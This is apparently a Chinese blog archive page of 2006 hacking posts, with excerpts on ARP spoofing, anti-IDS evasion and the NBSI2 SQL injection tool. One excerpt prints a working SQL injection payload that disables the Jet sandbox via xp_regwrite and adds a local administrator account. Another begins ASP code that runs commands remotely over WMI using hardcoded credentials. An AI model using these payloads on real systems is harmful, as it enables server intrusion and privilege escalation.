hacking
l0g
这个作者很懒,什么都没留下…
展开
-
交换网络中的嗅探和ARP欺骗
很老的文章了,但对深入了解网络协议,分析原理有很大帮助。以太网内的嗅探(sniff)对于网络安全来说并不是什么好事,虽然对于网络管理员能够跟踪数据包并且发现网络问题,但是如果被破坏者利用的话,就对整个网络构成严重的安全威胁。至于嗅探的好处和坏处就不罗嗦了。ARP缓存表假设这样一个网络:——————————| HUB |——————————| | | | | | | | | HostA原创 2006-01-13 20:24:00 · 822 阅读 · 0 评论 -
利用access执行命令的一个实例
;exec%20master..xp_regwrite%20HKEY_LOCAL_MACHINE,SOFTWARE/Microsoft/Jet/4.0/Engines,SandBoxMode,REG_DWORD,0;--%20and%200%20and%200net%20localgroup%20administrators%20l0g%20/add %20and%200原创 2006-01-11 01:01:00 · 1010 阅读 · 0 评论 -
asp使用wmi远程执行命令
文章作者:xiaolu[BST]信息来源:邪恶八进制信息安全团队(www.eviloctal.com)set ww=server.createobject("wbemscripting.swbemlocator")set cc=ww.connectserver("192.168.2.1","root/cimv2","administrator","xiaolu")set ss=cc.get("Wi原创 2006-01-13 02:08:00 · 871 阅读 · 0 评论 -
NBSI2内部功能实现大揭谜
作者:虚空 来自:www.csdn.net前段时间SQL注入很流行,用过小竹的NB2的人可能都知道,这个工具接近无敌,菜鸟用了它也能数秒把一个站给黑了,但是不了解其中的注入过程 可以说永远都进步不了吧~~首先声明,我也只是菜鸟一个,正好最近在研究SQL,随便把NB2的注入过程给研究了一个,所用工具wse,相信大家不会陌生的,网上到处有得下,我给一个地址,_blank>http://www.gxgl原创 2006-01-28 03:05:00 · 1043 阅读 · 0 评论 -
web历史记录
http://web.archive.org/原创 2006-03-07 01:15:00 · 1098 阅读 · 0 评论 -
反入侵检测技术
随着IDS(入侵检测系统)在网络环境中的使用越来越普遍,黑客在攻击一个装有I DS的网络时,首先考虑到的是对付IDS,一般采用的反IDS技术主要是"攻"(攻击IDS)或 者"避"(绕过IDS的监视)。本文根据网上的IDS资料和笔者的实际研究,主要介绍一下 当前主要的反NIDS(网络入侵检测系统)技术。 一.攻:包括直接攻击和间接攻击 1.直接攻击:直接对NIDS进行攻击。因为NIDS是安装在一定的转载 2006-06-27 20:59:00 · 1667 阅读 · 0 评论